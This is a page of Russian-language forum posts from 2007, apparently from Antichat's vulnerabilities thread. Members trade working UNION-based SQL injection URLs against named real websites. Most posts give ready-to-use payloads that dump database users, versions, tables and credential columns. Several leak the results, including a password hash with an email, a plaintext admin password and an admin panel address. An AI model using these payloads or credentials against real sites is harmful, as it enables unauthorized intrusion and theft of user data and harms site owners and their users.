ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, сейчас доступен на antichat.xyz.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2241  
Старый 20.05.2007, 02:46
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548

Репутация: 1942


По умолчанию

ы
Цитата:
http://www.is4ie.org/dynamic/listing.php?id=21+order+by+13
ы
 
Ответить с цитированием

  #2242  
Старый 20.05.2007, 09:38
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

http://www.nasheradio.net

Код:
http://www.nasheradio.net/news2.php?id=1'+union+select+1,concat(user(),char(%20%2058),database(),char(58),version()),3,4,5,6,7,8,9,1%20%200,11,12/*

http://www.promtractor.ru

Код:
http://www.promtractor.ru/products_show.php?section=-1+union+select+1,2,version(),4/*
 
Ответить с цитированием

  #2243  
Старый 20.05.2007, 13:59
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.presscenter.kz/index.php?show=news&id=-1+union+select+1,2,convert(concat(database(),char(58),user(),char(58),version()),char),4,5,6,7,8,9/*
http://www.presscenter.kz/index.php?show=news&id=-1+union+select+1,2,convert(table_name,char),4,5,6,7,8,9+from+information_schema.tables+limit+19,1/*
http://www.presscenter.kz/index.php?show=news&id=-1+union+select+1,2,concat(autorID,char(58),name,char(58),email,char(58),description,char(58),photo,char(58),positions),4,5,6,7,8,9+from+news_autors+limit+0,1/*
 
Ответить с цитированием

  #2244  
Старый 20.05.2007, 19:39
0rt
Новичок
Регистрация: 01.02.2007
Сообщений: 2
Провел на форуме:
34421

Репутация: 4
Отправить сообщение для 0rt с помощью ICQ
По умолчанию

Код:
http://www.kreschatic.kiev.ua/?id=3057+union+se lect+1,concat(user,p assword)+from+my sql.user/*
http://www.sistema. kz/?start=product&id= -1+union+select+1,password,login,4,5+from+admin+limit+0,1/*
http://www.aquaclub.cz/ article.php?id=-1+union+select+1,2,3, 4,5,6,7,8,9,concat(user(),char(58),version()),11+from+INFORMATION_SCHEMA.TABLES/*
http://searchmonster. org/index.php?l=-1+union+select+1,2,3,user,password ,6+from+mysql.user/*

Последний раз редактировалось 0rt; 20.05.2007 в 19:47..
 
Ответить с цитированием

sql
  #2245  
Старый 20.05.2007, 22:49
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql

http://hachoo.ru/ Дарить и получать подарки!

уязвимость: http://hachoo.ru/tag.php?tag=130'
таблицы и поля: user (login,password,email)
842 записи
root:f5d7e2532cc9ad16bc2a41222d76f269: business
Цитата:
http://hachoo.ru/tag.php?tag=-130'+union+select+1,concat_ws(0x3a,login,password, email)+from+user+limit+1,1/*
 
Ответить с цитированием

  #2246  
Старый 20.05.2007, 23:52
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://www.asinfo.com.ua/azov/az_forum_mess.php?id=-10+union+select+concat(user(),0x3a,version(),0x3a,database()),2/*&pg=
Код:
http://www.asinfo.com.ua/azov/az_forum_mess.php?id=-10+union+select+concat(name,0x3a,email),2+from+gbook/*&pg=
нашел одну таблицу: news

Код:
http://www.dosug.zp.ua/?go=ob&vidb=-1+union+select+email,url,3,icq,gorod,6,7,8+from+members/*
также вместо email/url/icq/gorod/ - можно подставить about/profession/education/lookinginfo

Код:
http://www.nhia.edu/news.php?id=-13+union+select+1,2,3,convert(concat(user(),0x3a,version(),0x3a,database())+using+latin1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+news/*
thank ettee(соучастник)

Последний раз редактировалось KPOT_f!nd; 20.05.2007 в 23:56..
 
Ответить с цитированием

sql
  #2247  
Старый 21.05.2007, 00:11
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql

http://www.color-foto.com/
Цитата:
http://www.color-foto.com/index.php?p=-43'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,conca t_ws(0x3a,user(),version(),database()),6,7+from+co ntent/*
 
Ответить с цитированием

  #2248  
Старый 21.05.2007, 12:09
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

http://www.sofiacityguide.com

Код:
http://www.sofiacityguide.com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

http://www.pizzamarketplace.com

Код:
http://www.pizzamarketplace.com/article.php?id=-1+union+select+version(),2,3,4,5,6,7,8/*
 
Ответить с цитированием

sql
  #2249  
Старый 21.05.2007, 16:45
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql

скулечка

http://www.safemaster.ru/
admins(login,pass)
Цитата:
http://www.safemaster.ru/info.php?id=-468+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,concat(login,0x3a,pass)+from+admins+limit+0,1/*
пасы открытые:
admin:3362278811
админка
Цитата:
http://www.safemaster.ru/admin/
 
Ответить с цитированием

  #2250  
Старый 21.05.2007, 20:39
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://krolik.ru/sex/list.php?tid=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
http://krolik.ru/sex/list.php?tid=-1+union+select+1,concat(id,char(58),name,char(58),pass,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+autors+limit+600,1/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ